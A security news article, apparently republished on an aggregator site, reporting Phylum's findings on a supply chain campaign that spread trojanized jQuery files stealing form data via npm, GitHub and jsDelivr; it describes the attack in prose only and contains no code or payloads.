Trojanized jQuery Packages Spread via Complex Supply Chain Attack

  /     /     /  
Publicated : 23/11/2024   Category : security


Trojanized jQuery Packages Spread via Complex Supply Chain Attack


The campaign, which distributes dozens of malicious jQuery variants across npm, GitHub, and jsDelivr, appears to be a manual effort, and lacks the typical pattern that characterizes similar, related attacks.



Once again, cyberattackers are targeting JavaScript developers — this time in a complex and persistent supply chain attack thats distributing Trojanized packages for the popular JavaScript library jQuery across GitHub,
Node Package Manager (npm)
, and jsDelivr repositories.
Each package contains a copy of jQuery with one small difference: the end function, a part of the jQuery prototype, is modified to include additional malicious code designed to extract website form data and send it to one of many URLs.
Thats according to the Phylum Research Team, which said that, notably, the attackers have shown an unusual lack of a clear pattern of nomenclature and attribution, which deviates from typical software supply chain attacks of this kind; it stands out due to the high variability across packages, the team wrote in
a recent blog post
.
The unknown attackers have spreading dozens of malicious jQuery packages since May 26, according to the research. Phylum researchers discovered the first malicious jQuery variant on
npm
, the default package manager for JavaScripts runtime Node.js; this variant then was published in dozens of
npm packages
over a months time. Later, the researchers found instances of the Trojanized jQuery on other platforms, such as GitHub, and even found a version in a content delivery network (CDN)-hosted resource on jsDelivr.
The volume of the published packages so far is relatively minimal, with about 68 in total found, the researchers said. The packages are often named jquery.min.js, with other variations such as registration.min.js, icon.min.js, and fontawesome.js. The exfiltration URLs were almost unique for each package, and the attacker published to npm under new usernames, according to the post.
Sometimes a single user would publish multiple, related malicious jQuery packages, while other times the attackers included multiple file versions with different names within the same project. Moreover, almost every package also contains personal files not typically included in npm publications, such as the npm cache folder, npm logs folder, and a termux.properties file.
Overall, this attack is unlike most weve seen at this scale, which typically have a clear, well-defined pattern and an obvious automated aspect, the team noted. Here, the ad-hoc nature and custom variability of the packages, along with the long timeframe over which they were published, suggest that each package was manually assembled and published.
The manual nature of the attack tracks with evidence that it appears to be a targeted effort: It takes a specific set of victim actions for the malware to execute.
For the malware to be triggered, a user must install one of the malicious packages, use the included trojanized jQuery file, and then invoke either the end function or the fadeTo function, according to the post.
That said, while the end function itself doesnt appear to be widely used directly in development that uses jQuery, the fadeTo function, which is from jQuery’s animation toolkit, uses this end method far more widely, the team noted.
This specific chain of conditions makes it unclear whether this is a highly targeted attack or if the attacker is simply blending in well and randomly affecting users who download and use these packages, according to the post.
Moreover, despite the narrow set of conditions required to trip the malware, the broad
distribution of the packages
means the attack can potentially have a wide impact that affects many unsuspecting developers, exemplifying the rising complexity and potential for the broad reach of supply chain threat actors, the team noted.
Indeed, the publication of malicious npm and other code packages to popular developer repositories has become an veritable security epidemic, with state-sponsored threat actors like
North Koreas Moonstone Sleet
and other threat actors using this tactic as a way to
poison
code across the software supply chain and thus reach a broad attack surface with minimal effort.
The increase in supply chain attacks that leverage code repositories requires heightened vigilance not only within the open source communities that manage the projects, but also among organizations, which are encouraged to scan any code used in development projects before distributing it to developers.
To help developers that use jQuery to avoid installing the malicious packages, Phylums researchers included a list of all the names of the packages related to the campaign and the date they were published as well as the username associated with who published them in the blog post. They also included a long list of domains related to the campaign.

Last News

▸ Criminal Possession of Government-Grade Stealth Malware ◂
Discovered: 23/12/2024
Category: security

▸ Senate wants changes to cybercrime law. ◂
Discovered: 23/12/2024
Category: security

▸ Car Sector Speeds Up In Security. ◂
Discovered: 23/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
Trojanized jQuery Packages Spread via Complex Supply Chain Attack